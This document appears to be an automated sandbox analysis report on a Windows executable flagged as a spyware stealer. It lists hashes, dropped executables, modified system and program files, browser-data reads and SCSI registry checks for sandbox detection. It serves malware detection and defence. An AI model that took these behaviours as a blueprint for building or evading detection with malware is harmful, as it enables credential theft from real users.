35465aee7014c058f5f214f02151db427a7959520059735b0d3bdab2a6eb28ba

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19/05/2024, 19:08 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
Size

1001KB
MD5

1f0eddd4b0780161f15abb19854525c0
SHA1

876dfc01dab77435f97237d1b67ff0f6bba792e9
SHA256

35465aee7014c058f5f214f02151db427a7959520059735b0d3bdab2a6eb28ba
SHA512

2caaa9c3ac43b44d2e442cc4559d25c54df48b22ffd0b3f8dff6a4c3afcc288aff600c058f36c167808e9ce4ab618d94e1ca859afe106dda68a92e38685a3148
SSDEEP

24576:pDMS76huDyq0et/HU9zPjeidP1Yi/dGyA:pDMi6tsUpLei7dGy

Score

7^/10

spyware stealer

Malware Config

Signatures

Executes dropped EXE 22 IoCs

pid	Process
2072	alg.exe
3116	DiagnosticsHub.StandardCollector.Service.exe
2180	fxssvc.exe
668	elevation_service.exe
2404	elevation_service.exe
2864	maintenanceservice.exe
2236	msdtc.exe
2084	OSE.EXE
1544	PerceptionSimulationService.exe
3040	perfhost.exe
4536	locator.exe
4888	SensorDataService.exe
4600	snmptrap.exe
4504	spectrum.exe
1972	ssh-agent.exe
3632	TieringEngineService.exe
3540	AgentService.exe
3576	vds.exe
3488	vssvc.exe
4580	wbengine.exe
2448	WmiApSrv.exe
1592	SearchIndexer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 37 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\locator.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\System32\snmptrap.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\spectrum.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\TieringEngineService.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\msiexec.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\msiexec.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\dllhost.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\msiexec.exe	alg.exe
File opened for modification	C:\Windows\System32\alg.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\System32\msdtc.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\system32\AgentService.exe	alg.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\dllhost.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\3f32d60c1ed82f9f.bin	alg.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\SearchIndexer.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	alg.exe
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\SysWow64\perfhost.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\vssvc.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\system32\AgentService.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\AgentService.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\System32\vds.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\system32\wbengine.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnetwk.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{38ACDD0D-FF02-4A34-B36C-7A103582B8C1}\chrome_installer.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jar.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\klist.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	DiagnosticsHub.StandardCollector.Service.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe	alg.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	DiagnosticsHub.StandardCollector.Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe

Checks processor information in registry 2 TTPs 2 IoCs

